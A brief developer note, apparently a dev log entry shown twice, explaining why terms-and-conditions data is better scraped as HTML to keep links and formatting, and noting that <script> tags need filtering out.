For scraping terms and condition data, I should be scraping the HTML instead of text.
This is because it will include external links that may be useful. Where if I keep pulling by text, then the links will be disregarded.
Or if the text is stylized/marked up like <b> or <strong> or <i>, etc, then it'll auto style it when displaying it as regular html.
Need to be careful to filter out any <script> tags in case there may be nefarious code coming in.
For scraping
terms and conditiondata, I should be scraping the HTML instead of text.This is because it will include external links that may be useful. Where if I keep pulling by
text, then the links will be disregarded.Or if the text is stylized/marked up like
<b>or<strong>or<i>, etc, then it'll auto style it when displaying it as regular html.Need to be careful to filter out any
<script>tags in case there may be nefarious code coming in.